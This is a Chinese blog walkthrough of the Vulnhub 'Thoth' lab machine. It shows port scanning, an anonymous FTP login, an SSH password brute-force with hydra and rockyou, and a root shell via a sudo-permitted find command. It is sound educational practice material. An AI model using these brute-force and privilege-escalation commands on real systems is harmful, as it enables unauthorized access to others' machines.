guayu-kakeru
0%

Vulunhub-Thoth

发表于 分类于

Vulunhub-Thoth靶场复盘

端口扫描/信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kakeru)-[~/tmp]
└─# nmap 192.168.240.0/24 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-03 11:38 CST
Nmap scan report for bogon (192.168.240.46)
Host is up (0.00039s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: FA:DB:E5:E9:94:F7 (Unknown)

Nmap scan report for bogon (192.168.240.52)
Host is up (0.010s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE    SERVICE
53/tcp   open     domain
8081/tcp filtered blackice-icecap
MAC Address: 3A:ED:9D:97:DA:7E (Unknown)

Nmap scan report for bogon (192.168.240.82)
Host is up (0.00020s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
5001/tcp open  commplex-link
7000/tcp open  afs3-fileserver
MAC Address: 3A:03:50:5A:8C:DF (Unknown)

Nmap scan report for bogon (192.168.240.83)
Host is up (0.0000040s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (4 hosts up) scanned in 5.36 seconds

开放了ssh html ftp 并且html也只有一个apache默认界面
看看ftp服务能不能匿名登录
发现可以登录并且有一个note.txt 说明我们要利用ftp
用get把这个文件下载到本地看看什么内容

1
2
3
4
5
┌──(root㉿kakeru)-[~/tmp]
└─# cat note.txt             
Dear pwnlab,

My name is jake. Your password is very weak and easily crackable, I think change your password.

提示有一个pwnlab用户,并且密码是弱密码

web探测

扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u http://192.168.240.46                
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/http_192.168.240.46/_25-02-03_13-04-19.txt

Target: http://192.168.240.46/

[13:04:19] Starting: 
[13:04:19] 403 -  279B  - /.ht_wsr.txt                                      
[13:04:19] 403 -  279B  - /.htaccess.bak1                                   
[13:04:19] 403 -  279B  - /.htaccess.orig                                   
[13:04:19] 403 -  279B  - /.htaccess.save                                   
[13:04:19] 403 -  279B  - /.htaccess_extra                                  
[13:04:19] 403 -  279B  - /.htaccess.sample
[13:04:19] 403 -  279B  - /.htaccessOLD2
[13:04:19] 403 -  279B  - /.htaccess_orig
[13:04:19] 403 -  279B  - /.htaccess_sc
[13:04:19] 403 -  279B  - /.htaccessBAK                                     
[13:04:19] 403 -  279B  - /.htaccessOLD
[13:04:19] 403 -  279B  - /.html                                            
[13:04:19] 403 -  279B  - /.htm                                             
[13:04:19] 403 -  279B  - /.htpasswd_test                                   
[13:04:19] 403 -  279B  - /.httr-oauth
[13:04:19] 403 -  279B  - /.htpasswds
[13:04:20] 403 -  279B  - /.php                                             
[13:04:31] 403 -  279B  - /server-status                                    
[13:04:31] 403 -  279B  - /server-status/                                   
[13:04:32] 200 -    7B  - /test.php                                         
[13:04:42] 301 -    0B  - /wordpress/  ->  http://192.168.1.8/wordpress/     
[13:04:42] 200 -    2KB - /wordpress/wp-login.php

有三个目录
test.php中没有有用内容,有登录界面
结合刚才的用户名用bp爆破一下 但是这个登录界面提交表单之后就报错
用wpscan扫描也没有信息
既然刚才说pwnlab用户密码是弱密码,就用hydra爆破一下ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kakeru)-[~/tmp]
└─# hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.240.46:22 -t 10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-03 13:13:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking ssh://192.168.240.46:22/
[STATUS] 165.00 tries/min, 165 tries in 00:01h, 14344234 to do in 1448:55h, 10 active
[22][ssh] host: 192.168.240.46   login: pwnlab   password: babygirl1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-03 13:15:39

成功拿到shell

提权

1
2
3
4
5
6
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find

有find的sudo权限
找到find的提权方式

1
sudo find . -exec /bin/sh \; -quit

-quit指令让find找到第一个匹配项之后就立即退出

拿到root权限

1
2
pwnlab@thothtech:~$ sudo find . -exec /bin/bash \; -quit
root@thothtech:/home/pwnlab#

非常简单的一个靶机,果然适合新手